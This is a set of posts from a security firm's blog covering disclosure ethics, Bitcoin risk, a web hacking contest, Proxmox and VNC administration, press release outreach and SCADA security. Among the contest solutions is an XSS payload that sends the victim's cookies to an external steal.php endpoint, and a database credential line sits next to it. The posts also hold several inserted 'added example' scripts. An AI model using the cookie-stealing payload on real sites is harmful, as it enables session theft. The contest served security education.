Security Research

Security researchers servants of a morbid system

Yesterday I was reading an article based on a Microsoft report titled “Security researchers exploiting vulnerabilities”.

For me, somebody who was born in the security and hacking scene, it’s total nonsense. The community was finally destroyed, around five years ago, by a short-sighted security market that had grown up in the five years before that.

Underground is dead, hackers were saying. As in an Andersen tale.

The fact is that nowadays exploit development has gone underground, or in the direction of paid bounties and “intelligence” exploit packs, i.e. in the money direction.

Since not every hacker or researcher wants to play this sick and ethic-less game (see the disappearance of the Full Disclosure mailing-list, for instance), fewer vulnerabilities are researched and disclosed pro bono, and if you want to access that knowledge you need extensive financial resources.

What is the result?

Vendors, big intelligence agglomerates and security corporations can tell people that they did a great job in securing the world, while the truth is exactly the opposite. High-impact vulnerabilities are now a bargaining chip and will not be disclosed publicly in a timely manner.

For those who believed in the Full Disclosure paradigm this is the last lost battle of a lost war.

Full Disclosure is part of a real Responsible Disclosure process: notify the vendor and force them to fix the issue fast, since it will be available to the public soon, and let people know the risk they are or were exposed to. Or feel free, also from an ethical point of view, to disclose the issue directly. This allowed independent security researchers to get the credit they deserved while guaranteeing transparency; naturally, very little money was involved.

With the current model of vulnerability trading the researcher loses any control over the disclosure process, which might not happen at all.

It’s easy to speculate, given the facts that are emerging every day (NSA, artificial crypto-weaknesses, cyber-intelligence and offense), that information gathered for a fraction of its value is now retained for an indefinite amount of time to allow its exclusive access and use by a number of well-known actors.

Call me idealistic but this maturity model smells of control.

Information is not free anymore.

–Francesco Ongaro
https://twitter.com/isgroupsrl

ISGroup

Reply to David Orban: Creatività, passione e innovazione in Finanza, Banche e Diritto

Thanks David for your lecture. It’s a very interesting set of considerations for somebody who, like me, has a background that doesn’t overlap with the subjects of macro-economics and global finance. Listening to your words I can feel the ethics and vision behind your enthusiasm for the topic.

Regarding the micro-economic and daily use of Bitcoin I see a big problem connected to the safety of John Doe’s savings, and I don’t know how that could be addressed with the current technical implementation.

The issue is the lack of insurance. In the past we built a protection mechanism where bigger institutions, directed by the corpus iuris, guaranteed and protected your money deposit from some types of threat. This happens with bank accounts under one hundred thousand euros in Italy in case of a bank failure. This happens with hijacked credit card transactions, to maintain a high level of customer trust in the system itself, an important surveillance and revenue stream in today’s economy. This happens thanks to insurance policies if your property gets destroyed.

Our current money can be simply reprinted or recreated or adjusted in case of a faulty banking IT system.

With Bitcoin or any crypto-currency the safety of the deposit rests entirely on the shoulders of the wallet owner, who must keep it on inherently vulnerable systems like personal computers, notebooks and smartphones.

We have already seen large-scale attacks against wallets, and most computer trojans now include bitcoin wallet stealing functionality alongside the old web banking one. Exchanges themselves have been hacked and have an amateur level of computer security and general hijack resiliency.

Additionally, if a user loses the private key or the wallet itself there is no way to recreate those coins.

How can a deflationary, fixed-size-pool, uninsured, global currency like Bitcoin work in the long term? Theoretically, over time, all the created coins could vanish into vapour :)

— Francesco Ongaro

ISGroup

Giacomo Rizzi, Web Security Challenge Winner, H-BANK

H-FARM supercharged the challenge with an amazing prize: an iPad Retina Mini! The contest consisted of three simple web pages to be hacked using the most common web security attack vectors: an XSS, a SQL Injection and a Local File Disclosure.

Giacomo Rizzi proved to be a developer aware of security issues, a paramount ability for a developer. Who would drive a car engineered to be super-fast but absolutely insecure?


Here’s Giacomo with the H-FARM sponsored prize!


Thanks again H-FARM for raising the security awareness level of tomorrow’s developers.

ISGroup

H-BANK Outcome: H-BANK Web Security Challenge (#2)

Interested in the challenge source code and solutions? Download the PDF!

ISGroup-HBANK-Challenge

Solutions provided by Giacomo Rizzi, the winner of the contest:

Challenge 1: H-FARM</textarea><script> (new Image()).src="http://10.1.2.172/steal.php?cookies="+document.cookie;</script><!--

Challenge 2: UGOTMEMADHAXOR!

Challenge 3: $link = mysql_connect('127.0.0.1', 'hackmehard', 'Psvm6bPywNQsaMNR');

ISGroup

H-BANK Outcome: ISGroup SRL @ H-Farm Ventures 8-9 February 2014 (#1)

On Friday 8 and Saturday 9 ISGroup took part in H-BANK, an initiative organised by H-Farm Ventures at its Roncade (Treviso) headquarters.


H-Farm organises, almost monthly, dynamic events full of young developers, designers, present and future entrepreneurs. This positive trend started with HackItaly, in which we took part by creating a playful project called KittensRevenge together with a team of skilled developers led by Valter Franchetti. To give you an idea of the creative environment, in those same two days we wrote Sniffing the innocent (HackItaly outcome #2) and Aruba networks log parser (HackItaly outcome #1). The goal of this competition was to take part in creative briefs from three banks (Unicredit, IFIS, Intesa San Paolo), building applications and websites able to satisfy the client’s requests.


Our (Francesco Ongaro, Gianluca Pericoli) contribution to the competition consisted of offering support on security issues. During the two-day marathon, the developers of the various teams could ask any kind of question about the security design of their application (“do the bricks we are putting together make sense from a security point of view?”) and about the secure implementation of specific features (“does this line of code introduce security problems?”).

It was also pleasant to discuss possible careers in our field and to give an overview of what the market requires, both in terms of skill-set and of the professional certifications that are in demand.

Security is the field we work in, and we hope that the daily intellectual challenges that make up a security researcher’s job will soon attract many young minds. In this regard, we would like to point out that internships are available at our company: contact us!

By taking part in H-Farm you can count on the availability and experience of two great people, Riccardo Donadon and Maurizio Rossi, who are not only genuinely interested in the innovation brought by every participant but also offer, in an economically difficult period, a concrete growth opportunity for young entrepreneurs.


Late at night, with the precious collaboration of Marco Pistolesi, ICT Manager at H-Farm, we organised a Web Hacking Contest (affectionately called “hack me hard”) that made available 3 pages affected by 3 different vulnerabilities. The goal was, in the best tradition of offensive security contests, to identify the vulnerabilities and exploit them. The winner of the competition was Giacomo Rizzi, a 19-year-old developer who, together with his classmates, provided the solution fastest.

H-ACK BANK is an example of aggregation of skills and development of ideas, as well as an organisation able to support a marathon with more than 400 participants over several days.

Or, more simply, a pleasant opportunity to spend a weekend in a relaxed environment :)

Security Research

OCZ RevoDrive 3 and OCZ RevoDrive 3 X2 PCIe SSD support for Linux 2.6

Support for OCZ RevoDrive3, RevoDrive3 X2 and zDrive R4 in Proxmox (and vanilla 2.6 kernel sources) is possible thanks to the work of robbat2 and geneanon. This repository contains all the information needed to patch your kernel and backport RevoDrive support into the stable 2.6.32 Proxmox kernel (the only one with OpenVZ support at the time of writing, Jan 2014).

https://github.com/isgroup-srl/ocz-revodrive-2.6-proxmox

Security Research

Proxmox 2.6.32 support for OCZ RevoDrive3, RevoDrive3 X2, zDrive R4

Please sustain the request for better PCI Express SSD support in the stable version of Proxmox VE: post a comment on https://github.com/proxmox/pve-kernel-2.6.32/issues/1 and contact the maintainers!

Dear Proxmox kernel maintainers,

OCZ provides terrible Linux support, in an attempt to “protect” the technology of their VCA chip, built on a Marvell 88SE9485 controller. Basically they try to discourage the adoption of RevoDrive3 and RevoDrive3 X2 on Linux machines in favour of other “enterprise” class products (zDrive R4). All in all, this attitude will earn them lifetime exclusion from the kernel and a painful user experience.

In reality the device just works with minor modifications to the mvsas driver [1], modifications that are already included in the mainline 3.2 kernel [2].

Additionally it seems, according to the report by b3rlin3r, that VCA actually decreases performance compared to the standard Marvell device [4]: the vanilla mvsas driver does 4612 TPs vs 3605 TPs for the OCZ VCA driver (actually two drivers, oczpcie and oczvca).

My request is to backport the robbat2 patch to the rhel6-2.6.32 kernel [3]; it’s just a matter of adding some PCI ids to the driver.

Thanks and have a great day,
Francesco ascii Ongaro
http://www.ush.it/ – http://www.isgroup.biz/

[1] http://www.ocztechnologyforum.com/forum/showthread.php?95151-Linux-patch-support-for-RevoDrive3-RevoDrive3-X2-zDrive-R4&p=686288&viewfull=1

[2] http://cateee.net/lkddb/web-lkddb/SCSI_MVSAS.html

[3] http://download.openvz.org/kernel/branches/rhel6-2.6.32/stable/

[4] http://www.ocztechnologyforum.com/forum/showthread.php?98087-OCZ-RevoDrive-3-X2-Linux-driver-AVAILABLE&p=715784&viewfull=1#post715784

Thanks,
Francesco `ascii` Ongaro
http://www.easyaudit.org

Security Research

Connecting to Proxmox VE OpenVZ containers using VNC

Proxmox VE has an administrative panel that allows connecting to KVM and OpenVZ virtual machines using a Java applet and the VNC protocol (RFB). The issue is that Java is a show-stopper for me: it’s unsafe, bloated and barely runs as a browser plugin. A lot of Proxmox users complain about this part of the implementation and try to find alternative ways to connect directly to the virtual VGA adapter of their machines.

Given the number of VNC implementations that use modern HTML5, WebSockets and Canvas, this seems a really poor choice to me. Proxmox devs, if you are listening, please implement this!

While it’s possible to directly “enter” an OpenVZ container by issuing a “vzctl” command, this requires shell access on the server node:

vzctl enter 101

There are many reasons that would make you prefer VNC access to the guest machine, one for all: avoiding giving host-node access to a sysadmin or a customer.

For KVM there are solutions available (manually editing the KVM configuration of the virtual machine to enable the VNC server), but for OpenVZ I wasn’t able to find a decent solution.

As in Xen, a component called “vncterm” is used to connect to OpenVZ containers, or to any other interactive command. Internally it uses X11VNC (http://www.karlrunge.com/x11vnc/x11vnc_opts.html).

The main issue was that the VNC server was offering a security type unsupported by most VNC clients (the infamous “Server did not offer supported security type” error).

$ vncviewer localhost::6900
Connected to RFB server, using protocol version 3.8
Server did not offer supported security type

Luckily vncterm allows passing arguments to x11vnc; by using a mix of such arguments we can re-enable a standard, password-based, unencrypted VNC server that works with most clients. The command is like the following (please change the “test” password to a stronger one!):

ssh -L 6901:localhost:6901 root@pve-node 'vncterm -nossl -nopw -vencrypt never -passwd test -rfbport 6901 -listen localhost -localhost -timeout 20 -c vzctl enter 101'

It creates an SSH TCP tunnel between the localhost:6901 port on the server and the localhost:6901 port on the client (the sysadmin’s notebook, for example). Then the admin will be able to connect using a standard vncviewer client:

vncviewer localhost::6901

This will work without the annoying VNC security type error and can be easily tweaked to work from inetd/xinetd or stunnel if you need encryption.
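As an added example (my own wrapper, not part of the original post or of Proxmox), the recipe above turned into a small script: it generates a random password instead of “test”, validates the container id and port before they are spliced into the remote command line, and only then opens the tunnel and the viewer. It assumes the node is reachable over SSH as root under the hypothetical name in $PVE_NODE, that vncterm and vzctl exist on it, and that vncviewer is installed locally. One caveat the script encodes: classic VNC authentication only uses the first 8 characters of the password, so anything longer gives no extra protection.

```shell
#!/bin/sh
# Added example (not from the original post): wraps the vncterm/ssh recipe
# with a generated password and input validation. Assumptions: the Proxmox
# host is reachable as $PVE_NODE over SSH as root, vncterm and vzctl exist
# on it, and vncviewer is installed locally.

PVE_NODE=${PVE_NODE:-pve-node}   # hypothetical host name, as in the post

# Classic VNC authentication uses only the first 8 characters of the
# password, so generate exactly 8 random alphanumerics instead of "test".
gen_vnc_password() {
    LC_ALL=C tr -dc 'A-Za-z0-9' </dev/urandom | head -c 8
}

# The container id and port end up inside a remote shell command line, so
# accept only plain integers (rejects anything like "101; ...").
validate_ctid() {
    case "$1" in ''|*[!0-9]*) return 1 ;; esac
}

validate_port() {
    case "$1" in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1024 ] && [ "$1" -le 65535 ]
}

# Builds the remote command from the post, parameterised on ctid/port/password.
# -listen localhost/-localhost keep the unencrypted RFB socket bound to the
# loopback interface of the node, so only the SSH tunnel can reach it.
build_vncterm_cmd() {
    ctid=$1 port=$2 passwd=$3
    validate_ctid "$ctid" || { echo "bad ctid: $ctid" >&2; return 1; }
    validate_port "$port" || { echo "bad port: $port" >&2; return 1; }
    case "$passwd" in
        ''|*[!A-Za-z0-9]*) echo "password must be alphanumeric" >&2; return 1 ;;
    esac
    printf '%s' "vncterm -nossl -nopw -vencrypt never -passwd $passwd -rfbport $port -listen localhost -localhost -timeout 20 -c vzctl enter $ctid"
}

# Opens the tunnel, starts vncterm on the node and connects a local viewer.
open_vnc_session() {
    ctid=$1 port=${2:-6901}
    passwd=$(gen_vnc_password)
    remote=$(build_vncterm_cmd "$ctid" "$port" "$passwd") || return 1
    echo "VNC password for CT $ctid: $passwd"
    # -f: ssh goes to background once the tunnel is up; vncterm exits after
    # -timeout seconds if nobody connects, which also ends the ssh session.
    ssh -f -L "$port:localhost:$port" "root@$PVE_NODE" "$remote"
    sleep 1
    vncviewer "localhost::$port"
}

# Usage: VNC_CTID=101 sh vnc-ct.sh run
if [ "${1:-}" = run ]; then
    open_vnc_session "${VNC_CTID:?set VNC_CTID}" "${VNC_PORT:-6901}"
fi
```

The validation matters more than it looks: the container id is interpolated into a command that ssh hands to the remote shell, so a script that takes it from a web form or a customer without checking it would be handing out a root shell on the node, exactly what the VNC detour was meant to avoid.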

For me it was a complete life saver!

Francesco `ascii` Ongaro
https://linkedin.com/in/ongaro

ISGroup

Press Release distribution analysis

Paying for distribution. Is it worth it? Here at ISGroup we have some daily SEO and Social Media tasks running alongside Penetration Testing and Ethical Hacking sessions. Nowadays every sane company does some Media/PR/Communication in-house, right? And while we are in no way experts, sometimes we perform better than “real” Media companies, at least from a technical perspective. Our advantage is that we can code BASH (LOL!) and measure results. You can do amazing automation with just CURL wrapped in some logic, and the hacking mindset applies perfectly to Content/SEO/Social automation. Still, there are professionals and companies who sell plain Ifttt and HootSuite to customers.

When it comes to Press Release distribution we generally outsource it. One can easily use Odesk and Fiverr to find contractors; after all, they should be better specialised and more efficient than us.

Whether we will keep this method or not is still under discussion, given the poor results we are getting lately. For example, a month ago I personally bought a gig from http://fiverr.com/cyberstorm/submit-your-press-release-to-50-top-pr-sites for a side project I’m expanding with Gianluca (not something we earn money from).

This is the Gig description, which sounded great:

MANUAL Press Submissions to USA BASED MEDIA. You can gain a wide audience for your site news with 50+ Top P.R website and some free Press Release Distribution sites. USE the PR & Search benefits of the online media with a service that gets results & saves your time & Make Money . PLEASE READ. All press releases must include your contact info at the bottom of the press release. Now you can add one IMAGE & VIDEO with ORDER. Gig Extras 50 more PR site $5 each , you can get up to 300 pr site $30 or 6 gigs.For 600 pr websites $50 or 10 gigs. PLEASE Make sure your press release is well written. Spelling and Grammar will not be checked. ( Press Release is submitted AS IS) I can help you promote your Start up, news business/company, Mobile Apps , kickstarter, indiegogo or any crowdfunding.

With an astonishing budget of $45 the promise is publication on more than 300 sites. Ideal for our Press Release about ScadaExposure (http://www.scadaexposure.com/)! The reality was pretty different.

The results of the campaign are:

  • Published on 109 unique domains, for a total of 131 posts;
  • Half of them are not working (not resolving, the ones with “investor” in the subdomain);
  • Only 9 pass a link to our target URL;
  • 8 of them are PR0 sites, like socialjunki.com;
  • 1 PR1 link from prnation.org;
  • The prnation.org service is worth $5.

In conclusion, one can achieve better results without outsourcing Press Release distribution: just use the right free resources and buy the right services from the beginning!

Note to self, many PR resources are free or very affordable:

  • http://comunicatinocost.x10.mx/ [Free, ITA]
  • http://launch.it/ [Free]
  • http://new.pitchengine.com/ [Free(1 Article)+Pay] From $39/Article
  • http://pressreleaser.org/ [Free but not accepting new members]
  • http://prnation.org/ [Pay] From $5/Article
  • https://aap.com.au
  • http://www.1888pressrelease.com/ [Free+Pay] From $15/Article
  • http://www.24-7pressrelease.com/ [Pay] From $49/Article
  • http://www.clickpress.com/ [Pay] From $75/Article
  • http://www.freepressindex.com/
  • http://www.free-press-release.com/
  • http://www.i-newswire.com/
  • http://www.marketpressrelease.com/
  • http://www.mediasyndicate.com/
  • http://www.newswiretoday.com/ [Free+Pay] From $99/Month
  • http://www.onlineprnews.com/ [Free+Pay] From $22/Article
  • http://www.openpr.com/ [Free]
  • http://www.pr.com/ [Free+Pay] From $199/Year
  • http://www.pressreleasecircle.com/ [Pay] From $15/Article
  • http://www.prleap.com/ [Free+Pay] From $79/Article
  • http://www.prlog.org/ [Free]
  • http://www.prnewswire.com/ [Pay] $195/Year
  • http://www.prweb.com/ [Free+Pay] From $99/Article
  • http://www.przoom.com/ [Same people of newswiretoday.com]
  • http://www.realwire.com/ [Pay] From £125/Article
  • http://www.sbwire.com/ [Pay] From $20/Article
  • http://www.scoop.it/ [Free]
  • http://www.vdsys.com/ [???]
It would be nice to measure the performance level of each service!
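As an added example of the “CURL wrapped in some logic” approach (my own script, not ISGroup’s tooling), here is how the three numbers reported above, unique domains, dead hosts and posts that actually pass a link to the target URL, can be measured from a list of published post URLs. The sample URL list and page bodies are constructed for illustration; prnation.org and socialjunki.com are the only names taken from the post, and the live check only runs when the script is started with “run”.

```shell
#!/bin/sh
# Added example (not ISGroup's own tooling): curl plus a little logic to
# measure a press release campaign. SAMPLE_URLS, LINKED_HTML and
# MENTION_HTML are constructed test data.

TARGET_URL="http://www.scadaexposure.com/"

# Constructed list of "published" post URLs, one per line.
SAMPLE_URLS='http://prnation.org/release/scadaexposure-1
https://socialjunki.com/post/123
http://investor.example.com/pr/456
http://socialjunki.com/post/789'

# Constructed page bodies: one carries a real anchor to the target, the
# other only mentions it as text, which passes no link.
LINKED_HTML='<p>Read more at <a href="http://www.scadaexposure.com/">ScadaExposure</a></p>'
MENTION_HTML='<p>Read more at http://www.scadaexposure.com/ today</p>'

# Host part of a URL: scheme stripped, port/path/query dropped, lowercased.
extract_domain() {
    printf '%s\n' "$1" | sed -E 's#^[A-Za-z]+://##; s#[/:?].*$##' | tr 'A-Z' 'a-z'
}

# Number of non-empty URLs read from stdin.
count_posts() {
    grep -c . || true
}

# Number of distinct hosts among the URLs read from stdin.
count_unique_domains() {
    while IFS= read -r url; do
        if [ -n "$url" ]; then extract_domain "$url"; fi
    done | sort -u | wc -l | tr -d ' '
}

# True when the HTML contains an href pointing at the target URL.
# The target is escaped so that it is matched literally, not as a regex.
links_to_target() {
    escaped=$(printf '%s' "$2" | sed 's|[.[\*^$+?(){}|]|\\&|g')
    printf '%s' "$1" | grep -qiE "href=[\"']$escaped"
}

# Live check of one URL: "DEAD" when it does not resolve or connect,
# otherwise the HTTP status and whether the page links to the target.
check_post() {
    url=$1
    body=$(mktemp)
    code=$(curl -sS -L --max-time 15 -o "$body" -w '%{http_code}' "$url" 2>/dev/null) || code=000
    if [ "$code" = 000 ]; then
        echo "$url DEAD"
    elif links_to_target "$(cat "$body")" "$TARGET_URL"; then
        echo "$url $code LINK"
    else
        echo "$url $code nolink"
    fi
    rm -f "$body"
}

# Usage: sh pr-audit.sh run < published-urls.txt
if [ "${1:-}" = run ]; then
    urls=$(cat)
    printf '%s\n' "$urls" | while IFS= read -r u; do
        if [ -n "$u" ]; then check_post "$u"; fi
    done
    printf 'posts: %s  unique domains: %s\n' \
        "$(printf '%s\n' "$urls" | count_posts)" \
        "$(printf '%s\n' "$urls" | count_unique_domains)"
fi
```

Run it once right after delivery and again a month later: the difference between the two “LINK” counts is the number the seller should be judged on, and it is the figure a contractor will rarely volunteer.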

Security Community

Situation in Switzerland and Internationally

Extract from Federal Strategy Unit for IT FSUIT; Federal Intelligence Service FIS; Reporting and Analysis Centre for Information Assurance MELANI www.melani.admin.ch.

Since the Stuxnet worm became known in the second half of 2010, there has been an increased focus on the security of SCADA software. The basic difficulty with SCADA systems lies especially in their history: originally, they were sealed-off, independent, and proprietary systems, granting external access at most to the manufacturer for maintenance purposes via a dial-up modem.

Accordingly, these systems hardly ever have functions to protect them from electronic attacks. Recently, programmable logic controllers and process control technology have become increasingly networked, increasingly use standardised protocols and technologies, and are even sometimes reachable via the Internet. Using a special computer search engine (in contrast to website search engines such as Google, Bing etc.), it has become significantly easier to find such devices.

The media presence of Stuxnet apparently awakened the interest in industrial control technology and SCADA systems among many security experts as well. Since then, various vulnerabilities in such products have been found and reported on. Methods have been discovered allowing systems to be taken over remotely, to download or upload any kind of file, to shoot down specific services or controllers, to infiltrate and launch code, and to simply inject false data to which the controllers then react as if they were correct.

The big difference compared with traditional computer software is that manufacturers so far have little experience in resolving vulnerabilities, and that the software of the components is only rarely updated by the operators. In the case of continuously running processes, this can only be done during specific maintenance windows. The effects of patches on the overall process may often be tested only to a very limited extent in advance. The principle “don’t touch a running system” entails that failures and breakdowns may quickly give rise to high costs.

SCADA systems are increasingly often connected with the administration systems of companies in order to make business decisions on the basis of real-time data, and data are increasingly exchanged via the Internet. Advocating the strict separation of operational and administrative systems is probably a good idea, but is likely illusory and impractical. Instead, the associated new dangers and risks must be identified, assessed, and strategies for identification and repair in the event of an incident must be developed. However, there are various measures for avoiding interference: e.g. by using a VPN for remote access, a firewall with white listing, and signing of the control code and configuration.
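As an added example (my own, not part of the MELANI extract), this is what the “firewall with white listing” and VPN-only remote access measures look like on a gateway between the office network and a PLC segment: a default-deny nftables ruleset where only the listed flows are allowed and everything else is logged and dropped. All addresses, interface names and the VPN port are constructed placeholders. Note the limit of the measure: an allowlist decides who can reach the controller, not what an allowed workstation sends it, so it complements the signing of control code and configuration rather than replacing it.

```shell
#!/bin/sh
# Added example, not part of the MELANI extract: a default-deny nftables
# ruleset for a gateway in front of a PLC segment. All addresses, interface
# names and the VPN port are constructed placeholders.

# Dotted-quad sanity check; rejects anything that would break the ruleset.
validate_ip() {
    printf '%s\n' "$1" | awk -F. 'NF != 4 { exit 1 }
        { for (i = 1; i <= 4; i++) if ($i !~ /^[0-9]+$/ || $i > 255) exit 1 }'
}

# Renders the ruleset for: engineering workstation (ws), PLC (plc) and
# historian (hist). Only the listed flows are allowed; everything else is
# logged and dropped, so a scanner or an unexpected device on the office LAN
# cannot reach the controller at all.
render_ruleset() {
    ws=$1 plc=$2 hist=$3
    for a in "$ws" "$plc" "$hist"; do
        validate_ip "$a" || { echo "invalid address: $a" >&2; return 1; }
    done
    cat <<EOF
table inet scada_gw {
    chain input {
        type filter hook input priority 0; policy drop;
        iifname "lo" accept
        ct state established,related accept
        # remote maintenance only through the VPN endpoint, never straight to the PLC
        udp dport 51820 accept
        ip saddr $ws tcp dport 22 accept
    }
    chain forward {
        type filter hook forward priority 0; policy drop;
        ct state established,related accept
        ct state invalid drop
        # engineering workstation -> PLC: Modbus/TCP and nothing else
        ip saddr $ws ip daddr $plc tcp dport 502 ct state new accept
        # historian -> PLC: read-only polling over the same protocol
        ip saddr $hist ip daddr $plc tcp dport 502 ct state new accept
        # VPN users land on the workstation, not on the PLC segment
        iifname "wg0" ip daddr $ws tcp dport { 22, 3389 } accept
        log prefix "scada-gw drop: " drop
    }
}
EOF
}

# "check" parses the ruleset without loading it (needs the nft binary);
# "run" loads it.
if [ "${1:-}" = check ]; then
    render_ruleset 10.10.1.10 10.10.2.20 10.10.1.30 | nft -c -f -
elif [ "${1:-}" = run ]; then
    render_ruleset 10.10.1.10 10.10.2.20 10.10.1.30 | nft -f -
fi
```

The logged drops are the part worth watching: on a segment where every legitimate flow is enumerated, a single “scada-gw drop” line from an unexpected source is already an incident, not noise.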
